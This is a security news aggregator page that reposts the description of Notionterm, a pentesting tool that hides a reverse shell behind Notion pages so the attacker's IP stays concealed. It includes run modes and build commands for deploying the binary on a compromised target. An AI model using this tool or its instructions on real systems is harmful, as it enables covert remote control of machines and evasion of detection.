Zum Hauptinhalt springen
Echtzeit-Radar & Feeds
Alle RSS Feeds ➔
👥 Community & Social
AI & KI NachrichtenTechLinked: How Does This Keep Happening?(29.09.2026 um 07:06 Uhr)
•••
IT Security NachrichtenDurst der Daten: Wenn KI auf Wasserknappheit trifft(29.09.2026 um 08:43 Uhr)
••
Windows Tipps & SecuritySpielen Sie Mah-Jongg mit Voxjong kostenlos direkt im Browser(29.09.2026 um 08:00 Uhr)
••••
Sichere ProgrammierungI Built a Remote Jobs API That Parses Salary So You Don't Have To(29.09.2026 um 08:39 Uhr)
•
AI & KI NachrichtenTechLinked: How Does This Keep Happening?(29.09.2026 um 07:06 Uhr)
•••
IT Security NachrichtenDurst der Daten: Wenn KI auf Wasserknappheit trifft(29.09.2026 um 08:43 Uhr)
••
Windows Tipps & SecuritySpielen Sie Mah-Jongg mit Voxjong kostenlos direkt im Browser(29.09.2026 um 08:00 Uhr)
••••
Sichere ProgrammierungI Built a Remote Jobs API That Parses Salary So You Don't Have To(29.09.2026 um 08:39 Uhr)
•
Intelligence View
⚡ tsecurity.de Intelligence

Notionterm - Embed Reverse Shell In Notion Pages

Embed reverse shell in Notion pages.Hack while taking notes FOR: Hiding attacker IP in reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell) Demo/Quick proof…

0
↗ Quelle (kitploit.com)
Reagiere als Erste:r — dein Feedback zählt!

Embed reverse shell in Notion pages.
Hack while taking notes

FOR:

  • Hiding attacker IP in reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)
  • Demo/Quick proof insertion within report
  • High available and shareable reverse shell (desktop, browser, mobile)
  • Encrypted and authenticated remote shell

NOT FOR:

  • Long and interactive shell session (see tacos for that)

Why?

The focus was on making something fun while still being usable, but that's not meant to be THE solution for reverse shell in the pentester's arsenal

How?

Just use notion as usual and launch notionterm on target.

Requirements

  • Notion software and API key
  • Allowed HTTP communication from the target to the notion domain
  • Prior RCE on target

roughly inspired by the great idea of OffensiveNotion and notionion!

Quickstart

Set-up

  1. Create a page and give to the integration API key the permissions to have page write access
  2. Build notionterm and transfer it on target machine (see install)


Run

There are 3 main ways to run notionterm:

"normal" mode
Get terminal, stop/unstop it, etc...
notionterm [flags]
Start the shell with the button widget: turn ON, do you reverse shell stuff, turn OFF to pause, turn ON to resume etc...
"server" mode
Ease notionterm embedding in any page
notionterm --server [flags]
Start a shell session in any page by creating an embed block with URL containing the page id (CTRL+Lto get it): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].
light mode
Only perform HTTP traffic from target → notion
notionterm light [flags]

Install

As notionterm is aimed to be run on target machine it must be built to fit with it.

Thus set env var to fit with the target requirement:

GOOS=[windows/linux/darwin]

Simple build

git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go

You will need to set API key and notion page URL using either env var (NOTION_TOKEN & NOTION_PAGE_URL) or flags (--token & --page-url)

"All-inclusive" build

Embed directly the notion integration API token and notion page url in the binary.

everybody with access to the binary can retrieved the token. For security reason don't share it and remove it after use.

Set according env var:

export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]

And build it:

git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS go build notionterm.go


2. Cyber Threat Intelligence & Forensik

CTI Threat Relationship Graph5 Knoten / 4 Relationen
CVE / Incident Software MITRE ATT&CK CWE Weakness IoC
MITRE ATT&CK Matrix Navigator 14 Taktiken
2 belegte TechnikenLive-Mapping
Reconnaissance
Resource Development
Initial Access
Execution
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Command and Control
Exfiltration
Impact
Ähnliche Beiträge
🔍 Verwandte News

Auch interessante Nachrichten Notionterm - Embed Reverse Shell In Notion Pages

Thematisch verwandte Begriffe: Notionterm, Embed, Reverse, Shell · 6 Treffer

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

Laden...

Beiträge werden geladen ...

Laden...

Videos werden geladen ...

💬 Kommentare werden geladen…
Zum Aktualisieren ziehen
ZERO-DAY CVE-2026-101858 | A flaw has been found in RaspAP raspap-webgui up to 3.5.5. Affected is …
Advisory →
tsecurity.de Icon
Offline-Lesen, Eilmeldungen & 0ms Ladezeit

Installiere tsecurity.de direkt auf deinen Home-Bildschirm für das ultimative Vollbild-Magazinerlebnis ohne Browser-Leisten.

Nächster Beitrag